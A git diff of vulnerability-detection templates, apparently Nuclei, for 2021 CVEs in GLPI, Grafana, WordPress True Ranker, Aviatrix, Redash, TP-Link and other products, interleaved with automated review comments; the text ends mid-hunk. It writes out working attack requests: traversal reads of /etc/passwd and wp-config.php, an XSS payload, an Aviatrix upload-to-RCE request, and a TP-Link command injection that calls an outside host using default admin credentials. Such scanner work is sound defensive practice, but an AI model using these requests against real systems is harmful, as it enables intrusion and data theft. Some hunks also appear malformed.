@@ -1,24 +1,35 @@ id: CVE-2021-39211 + info: - name: GLPI Telemetry Disclosure + name: GLPI 9.2/<9.5.6 - Information Disclosure author: dogasantos,noraj severity: medium - description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information. + description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 - https://github.com/glpi-project/glpi/releases/tag/9.5.6 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-39211 - cwe-id: CWE-668,CWE-200 + cwe-id: CWE-200,NVD-CWE-noinfo + epss-score: 0.00166 + epss-percentile: 0.53249 + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: glpi-project + product: glpi tags: cve,cve2021,glpi,exposure -requests: + +http: - method: GET path: - "{{BaseURL}}/ajax/telemetry.php" - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and matchers: - type: word @@ -26,6 +37,8 @@ requests: - '"uuid":' - '"glpi":' condition: and + - type: status status: - 200 +# digest: 4a0a004730450220493c71801722f7e62cca179faa4bd7d3ef10fb9f358b42162ae4ebab27fee6f1022100879a2331f916109ef5ec80b5a2e795e4f9a8e9200df37a6e7dcdfe78b5686752:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-39226.yaml b/poc/cve/CVE-2021-39226.yaml index 1bff9d9534..3266a19a2b 100644 --- a/poc/cve/CVE-2021-39226.yaml +++ b/poc/cve/CVE-2021-39226.yaml 
@@ -1,30 +1,44 @@ id: CVE-2021-39226 + info: - name: Grafana Snapshot Authentication Bypass + name: Grafana Snapshot - Authentication Bypass author: Evan Rubinstein + severity: high description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). - remediation: "This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects." + remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' 
reference: - https://github.com/advisories/GHSA-69j6-29vr-p3j9 - https://nvd.nist.gov/vuln/detail/CVE-2021-39226 - severity: critical - tags: cve,cve2021,grafana + - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269 + - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/ + - http://www.openwall.com/lists/oss-security/2021/10/05/4 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 cve-id: CVE-2021-39226 - cwe-id: CWE-200 -requests: + cwe-id: CWE-287 + epss-score: 0.92988 + epss-percentile: 0.988 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: grafana + product: grafana + shodan-query: title:"Grafana" + tags: cve,cve2021,grafana,kev + +http: - method: GET path: - "{{BaseURL}}/api/snapshots/:key" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - '"isSnapshot":true' -# Enhanced by cs on 2022/02/22 + - type: status + status: + - 200 +# digest: 490a004630440220724d7049bfdc5f75f1a8a34ba19b4b50804ecad851816de8bf9605e2cd3104d102206c42edabf1b7f4e0cbb32d0d5d50da94730819e1a944c39e04ca6e8ca94883ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-39312.yaml b/poc/cve/CVE-2021-39312.yaml index c01cb9c597..02e3b11697 100644 --- a/poc/cve/CVE-2021-39312.yaml +++ b/poc/cve/CVE-2021-39312.yaml 
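Review bot: The `remediation` string on the new side lists `/api/snapshots/:key` twice, while the `description` spells the route `/api/snapshot/:key`, so a reader building a block rule from this text cannot tell which paths are meant. I would list each path once, e.g. `block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey and /dashboard/snapshot/:key`. If the singular form in the description is a typo, it should be aligned with the path the request sends, `{{BaseURL}}/api/snapshots/:key`. The word matcher for `"isSnapshot":true` has no `part:`; adding `part: body` would make the intent explicit, as in the other templates touched by this commit.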
@@ -1,32 +1,22 @@ id: CVE-2021-39312 - info: name: WordPress True Ranker <2.2.4 - Local File Inclusion author: DhiyaneshDK severity: high description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. - remediation: Fixed in version 2.2.4 reference: - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 + remediation: Fixed in version 2.2.4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-39312 - cwe-id: CWE-22 - epss-score: 0.06634 - epss-percentile: 0.93061 - cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: trueranker - product: true_ranker - framework: wordpress - tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress - -http: + cwe-id: CWE-22,CWE-22 + tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr +requests: - raw: - | POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 @@ -35,7 +25,6 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php - matchers-condition: and matchers: - type: word @@ -44,8 +33,8 @@ http: - "DB_NAME" - "DB_PASSWORD" condition: and - - type: status status: - 200 -# digest: 490a0046304402203660c5019a3cd1bf62a8253c6dbe4802a218ac3e49b420f0c7924aaced5592c10220344d7c776624e12950508b7434bdca716d524e807294a21cb56b68774a46a3c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/30 
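Review bot: The classification on the new side reads `cwe-id: CWE-22,CWE-22`, repeating the same identifier; it should be `cwe-id: CWE-22`, as on the side being replaced. A consumer that splits this field on commas would otherwise record the weakness twice for one finding.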
diff --git a/poc/cve/CVE-2021-40868.yaml b/poc/cve/CVE-2021-40868.yaml index 83e04d2453..be592e9734 100644 --- a/poc/cve/CVE-2021-40868.yaml +++ b/poc/cve/CVE-2021-40868.yaml @@ -1,5 +1,4 @@ id: CVE-2021-40868 - info: name: Cloudron 6.2 Cross-Site Scripting author: daffainfo @@ -9,40 +8,28 @@ info: reference: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 - - https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html - - https://www.cloudron.io/ + tags: cve,cve2021,xss,cloudron classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-40868 cwe-id: CWE-79 - epss-score: 0.00267 - epss-percentile: 0.64121 - cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cloudron - product: cloudron - tags: cve,cve2021,xss,cloudron,packetstorm - -http: +requests: - method: GET path: - '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: header words: - "text/html" - - type: word - part: body words: - '' + part: body - - type: status - status: - - 200 -# digest: 4a0a00473045022100a1d8a102cc043267832fa94d11d430345354fd5df4b460554a26aa1a60c083c102204f80a05e99897cc2acf09de2b8b484233956a43510fd6d956c96da0d5e14555a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/03/06 diff --git a/poc/cve/CVE-2021-40870.yaml b/poc/cve/CVE-2021-40870.yaml index c40e570da3..db8ead6510 100644 --- a/poc/cve/CVE-2021-40870.yaml +++ b/poc/cve/CVE-2021-40870.yaml 
@@ -1,41 +1,51 @@ id: CVE-2021-40870 + info: - name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution + name: Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution author: pikpikcu severity: critical description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal. + remediation: | + Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability. reference: - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021 - https://wearetradecraft.com/advisories/tc-2021-0002/ - https://nvd.nist.gov/vuln/detail/CVE-2021-40870 + - http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-40870 - cwe-id: CWE-434 - tags: cve,cve2021,rce,aviatrix,kev -requests: + cwe-id: CWE-23 + epss-score: 0.9088 + epss-percentile: 0.98553 + cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: aviatrix + product: controller + tags: intrusive,packetstorm,cve,cve2021,rce,aviatrix,kev,fileupload + +http: - raw: - | POST /v1/backend1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=HACKERMAN + CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data= - | GET /v1/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - - 'HACKERMAN' - - "PHP Extension" - - "PHP Version" - condition: and + - '0d95513363fd69b9fee712f333293654' -# Enhanced by mp on 2022/03/06 + - type: 
status + status: + - 200 +# digest: 4a0a0047304502200eec3d9aadf7bb71831a8b8e148b1902d3d6bc0fb24119a516d7d3797e47a05b022100cda620925d111f86251eb1e8da423aedc562bd5118930fcd608a22f1e4caaf3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-40960.yaml b/poc/cve/CVE-2021-40960.yaml index e4cb4cbc26..2e39c1b7b4 100644 --- a/poc/cve/CVE-2021-40960.yaml +++ b/poc/cve/CVE-2021-40960.yaml @@ -1,42 +1,29 @@ id: CVE-2021-40960 - info: name: Galera WebTemplate 1.0 Directory Traversal author: daffainfo severity: critical description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0. reference: - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 - - http://www.galera.com.tr/ + tags: cve,cve2021,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-40960 cwe-id: CWE-22 - epss-score: 0.00946 - epss-percentile: 0.81377 - cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: galera - product: galera_webtemplate - tags: cve,cve2021,lfi - -http: +requests: - method: GET path: - "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 -# digest: 4a0a0047304502210088c148ff9f89f9815cdd50e5d3e4d5b8249e4413fc6b373a135d8c02d22d02f802207cd7e243133a94b5fa46eea3a0266327434cf04da3b5b70745b30f428176335e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/06 
diff --git a/poc/cve/CVE-2021-40978.yaml b/poc/cve/CVE-2021-40978.yaml index 81ec5d959e..45793e0f1b 100644 --- a/poc/cve/CVE-2021-40978.yaml +++ b/poc/cve/CVE-2021-40978.yaml 
@@ -1,33 +1,45 @@ id: CVE-2021-40978 info: - name: mkdocs 1.2.2 built-in dev-server allows directory traversal + name: MKdocs 1.2.2 - Directory Traversal author: pikpikcu severity: high + description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited. + remediation: | + Upgrade MKdocs to version 1.2.3 or later to fix the directory traversal vulnerability. reference: + - https://github.com/mkdocs/mkdocs/pull/2604 - https://github.com/nisdn/CVE-2021-40978 - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 - tags: cve,cve2021,mkdocs,lfi - description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." 
+ - https://github.com/mkdocs/mkdocs + - https://github.com/mkdocs/mkdocs/issues/2601 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-40978 cwe-id: CWE-22 + epss-score: 0.0345 + epss-percentile: 0.90463 + cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mkdocs + product: mkdocs + tags: cve,cve2021,mkdocs,lfi -requests: +http: - method: GET path: - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' matchers-condition: and matchers: - - type: regex + part: body regex: - "root:[x*]:0:0:" - part: body - type: status status: - 200 +# digest: 490a00463044022051fe4885f17ecb3068259162af6afb01b04b6784cd4bf9539857db99cc8263bc02202093c9039245b45870d4691050a508dfe974999234e8da26e3b95a9d65ecedb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-41192.yaml b/poc/cve/CVE-2021-41192.yaml index b01dc66949..0dbe5c2c26 100644 --- a/poc/cve/CVE-2021-41192.yaml +++ b/poc/cve/CVE-2021-41192.yaml 
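Review bot: The added `remediation` names only the upgrade to 1.2.3, while the new `description` says the issue is reachable only when the dev server is exposed publicly. I would add the operational fix as a second sentence, `Do not expose the built-in dev server to untrusted networks; serve the built site from a production web server.` That keeps the finding actionable for sites that cannot upgrade right away.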
@@ -1,40 +1,27 @@ id: CVE-2021-41192 - info: name: Redash Setup Configuration - Default Secrets Disclosure author: bananabr severity: medium - description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. - remediation: | - Remove or update the default secrets in the Redash setup configuration file. + description: "Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value." 
reference: - https://hackerone.com/reports/1380121 - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv - https://nvd.nist.gov/vuln/detail/CVE-2021-41192 - - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214 + metadata: + shodan-query: http.favicon.hash:698624197 + tags: cve,cve2021,redash,auth-bypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N - cvss-score: 6.5 + cvss-score: 6.50 cve-id: CVE-2021-41192 cwe-id: CWE-1188 - epss-score: 0.00805 - epss-percentile: 0.79737 - cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: "redash" - product: "redash" - shodan-query: http.favicon.hash:698624197 - tags: hackerone,cve,cve2021,redash,auth-bypass - -http: +requests: - method: GET path: - "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" - "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" - stop-at-first-match: true - matchers-condition: and matchers: - type: word @@ -43,8 +30,8 @@ http: - "Enter your new password:" - "redash" condition: and - - type: status status: - 200 -# digest: 4b0a00483046022100dd7ef1492189229093bdf21e68ed2b0fcc1830e419627ac08625096f0b7e0f93022100ac11bc910f3991a39c9c69d87a5db97af98a79ca2989067965699afe7d30dfce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/CVE-2021-41266.yaml b/poc/cve/CVE-2021-41266.yaml index e627cd3b4b..8c35979048 100644 --- a/poc/cve/CVE-2021-41266.yaml +++ b/poc/cve/CVE-2021-41266.yaml 
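Review bot: `stop-at-first-match: true` is removed from the request block, so both reset paths are always requested and a host that answers on both can be reported twice; I would keep `stop-at-first-match: true`. The new side also drops `remediation`, although the description already names the fix. A one-line `remediation: Set REDASH_COOKIE_SECRET and REDASH_SECRET_KEY explicitly instead of relying on the shared default.` would restore the guidance.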
@@ -1,22 +1,31 @@ id: CVE-2021-41266 + info: name: MinIO Operator Console Authentication Bypass author: alevsk severity: critical description: | MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. - remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token." + remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.' reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41266 - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36 - https://github.com/minio/console/pull/1217 - tags: cve,cve2021,minio classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-41266 cwe-id: CWE-306 -requests: + epss-score: 0.05383 + epss-percentile: 0.9231 + cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: min + product: minio_console + tags: cve,cve2021,minio + +http: - raw: - | POST /api/v1/login/oauth2/auth HTTP/1.1 
@@ -25,20 +34,22 @@ requests: Content-Type: application/json {"code":"test","state":"test"} + matchers-condition: and matchers: - - type: status - status: - - 201 - - 200 - condition: or - type: word part: body words: - "sessionId" + - type: word part: header words: - "token" -# Enhanced by mp on 2022/03/06 + - type: status + status: + - 201 + - 200 + condition: or +# digest: 4b0a00483046022100d4f00112bf03bbb6b82a7583f280a1eb4916acc4238ab8ebfd475ab0528417530221008f70ddddee0a3baba5cad0f9162481428f4befd198bfe56b971e16f9926032fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-41291.yaml b/poc/cve/CVE-2021-41291.yaml index 40c981d32a..019635b732 100644 --- a/poc/cve/CVE-2021-41291.yaml +++ b/poc/cve/CVE-2021-41291.yaml 
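Review bot: The header matcher in this hunk looks for the bare word `token` anywhere in the response headers, which stays a loose signal even with the added `matchers-condition: and`. Nothing in the hunk shows which header is expected to carry it, so I would at least document the intent with a comment such as `# session token returned in the response headers on a successful login (confirm header name)`. If the console returns it as a cookie, matching that header form would be tighter.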
@@ -1,39 +1,27 @@ id: CVE-2021-41291 - info: name: ECOA Building Automation System - Directory Traversal Content Disclosure author: gy741 severity: high description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41291 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html - - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html + tags: cve,cve2021,ecoa,lfi,traversal classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2021-41291 cwe-id: CWE-22 - epss-score: 0.0476 - epss-percentile: 0.91811 - cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ecoa - product: ecs_router_controller-ecs_firmware - tags: cve,cve2021,ecoa,lfi,traversal - -http: +requests: - raw: - | GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - matchers: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a0047304502200ab375779c544247084df27df2110d5e8bd971a7afb0521769179671fc5c79c6022100c97200d389557ae7066e36b39411f6f4529049c4aea2d43aae22595186561f0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/06 diff --git a/poc/cve/CVE-2021-41569.yaml b/poc/cve/CVE-2021-41569.yaml index 7cbddb68f3..a65c219ae1 100644 --- a/poc/cve/CVE-2021-41569.yaml +++ b/poc/cve/CVE-2021-41569.yaml 
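Review bot: The only matcher on the new side is the regex `root:.*:0:0:`, with no status check and no explicit `part`, so any response that happens to contain that pattern is reported. I would tighten it to `root:[x*]:0:0:`, as the CVE-2021-40978 template in this patch does, and add a `type: status` matcher for `200` under `matchers-condition: and`.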
@@ -1,42 +1,28 @@ id: CVE-2021-41569 - info: - name: SAS/Internet 9.4 1520 - Local File Inclusion + name: SAS 9.4 build 1520 - Local File Inclusion author: 0x_Akoko severity: high - description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. - remediation: | - Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application. + description: SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. reference: - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas - - https://support.sas.com/kb/68/641.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41569 + - https://support.sas.com/kb/68/641.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41569 cwe-id: CWE-829 - epss-score: 0.00978 - epss-percentile: 0.81694 - cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sas - product: sas\/intrnet tags: cve,cve2021,sas,lfi - -http: +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 -# digest: 
4b0a00483046022100b5ed72e2112da2f28d093daf01c613d3fb7fbdaaa619c1ce41d58efdde1876d5022100c1bccde6c025af52cad8129238983b19f09549900d4f0a97f3aa8b002d4deee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-41653.yaml b/poc/cve/CVE-2021-41653.yaml index 0b2062a76c..2595cd5ef5 100644 --- a/poc/cve/CVE-2021-41653.yaml +++ b/poc/cve/CVE-2021-41653.yaml @@ -1,33 +1,21 @@ id: CVE-2021-41653 - info: name: TP-Link - OS Command Injection + description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. author: gy741 severity: critical - description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". reference: - https://k4m1ll0.com/cve-2021-41653.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41653 - https://www.tp-link.com/us/press/security-advisory/ - - http://tp-link.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-41653 cwe-id: CWE-94 - epss-score: 0.95374 - epss-percentile: 0.99172 - cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: tp-link - product: tl-wr840n_firmware tags: cve,cve2021,tplink,rce,router -variables: - useragent: '{{rand_base(6)}}' - -http: +requests: - raw: - | POST /cgi?2 HTTP/1.1 @@ -40,7 +28,7 @@ http: dataBlockSize=64 timeout=1 numberOfRepetitions=4 - host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}') + host=$(echo 127.0.0.1; wget http://{{interactsh-url}}) X_TP_ConnName=ewan_ipoe_d diagnosticsState=Requested - | 
@@ -51,17 +39,10 @@ http: Cookie: Authorization=Basic YWRtaW46YWRtaW4= [ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0 - - matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: word - part: interactsh_request - words: - - "User-Agent: {{useragent}}" - -# digest: 490a004630440220752d1a35c5152419dacd9908a794244472a635bd8142f442d7cc7c88b204879b0220494cf93f6429b61a87d6c82bcd93eed1ea759f32f72eb7adfbbf425ed650b72c:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/02/27 diff --git a/poc/cve/CVE-2021-41691.yaml b/poc/cve/CVE-2021-41691.yaml index 9c1638f94a..8b7aa30835 100644 --- a/poc/cve/CVE-2021-41691.yaml +++ b/poc/cve/CVE-2021-41691.yaml @@ -1,25 +1,17 @@ id: CVE-2021-41691 - info: name: openSIS Student Information System 8.0 SQL Injection author: Bartu Utku SARP severity: high description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. - remediation: | - Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). reference: - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://www.exploit-db.com/exploits/50637 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 classification: cve-id: CVE-2021-41691 - metadata: - max-request: 2 - tags: sqli,auth,edb,cve,cve2021,opensis -variables: - num: "999999999" - -http: + tags: cve,cve2021,opensis,sqli,auth +requests: - raw: - | POST /index.php 